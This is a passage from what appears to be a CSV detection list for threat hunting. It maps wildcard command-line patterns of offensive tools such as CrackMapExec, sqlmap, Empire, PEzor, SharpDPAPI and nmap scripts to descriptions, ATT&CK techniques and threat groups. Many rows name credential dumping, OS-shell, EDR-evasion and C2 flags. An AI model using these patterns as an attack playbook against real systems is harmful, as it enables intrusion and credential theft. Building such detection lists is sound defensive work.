Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * --sam","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p *--pass-pol*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u *http* --dbs","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -u *http* --os-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -u FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -u http* -f *.dll * -p *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* -U msf -P msf *","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"* -u wordlist * wordlist_uniq_sorted*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","0","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"* uberfile.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* ubiquiti-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --unconstrained-users*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" +"* unDefender.exe*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"* -unhook -antidebug * -self -sleep*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -unhook -syscalls -obfuscate *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* --unhook-method * --dont-unload-driver * --dump-output *","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"* unicorn.py*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"* --union-char *GsFRts2*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* unittest.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* unusual-port.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* uptime-agent-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -UrbanBishop -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --url * --attacker *","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","0","N/A","N/A","3","219","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" +"* --url --password SIMPLEPASS*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"* -urlcache */debase64/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* url-snarf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Use-DarkHotel*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"* -user * --passwordlist *","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"* userenum * --dc *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -Username * -Hash * -Command *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Username * -Password * -Command * -LogonType *","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"* --UserName * --Password * --Payload *.exe*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"* -UserPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --user-spns*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" +"* UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"* -VaultElementPtr *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* vaults /target:* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* ventrilo-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* versant-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* vmauthd-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* vmware-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* vnc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* vnc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* vnc-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* voldemort-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* vtam-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -vulnerable -stdout -hide-admins*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* vulners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* vulscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"* vuze-dht-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -w wordlist/*.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -watson -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* wdb-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - 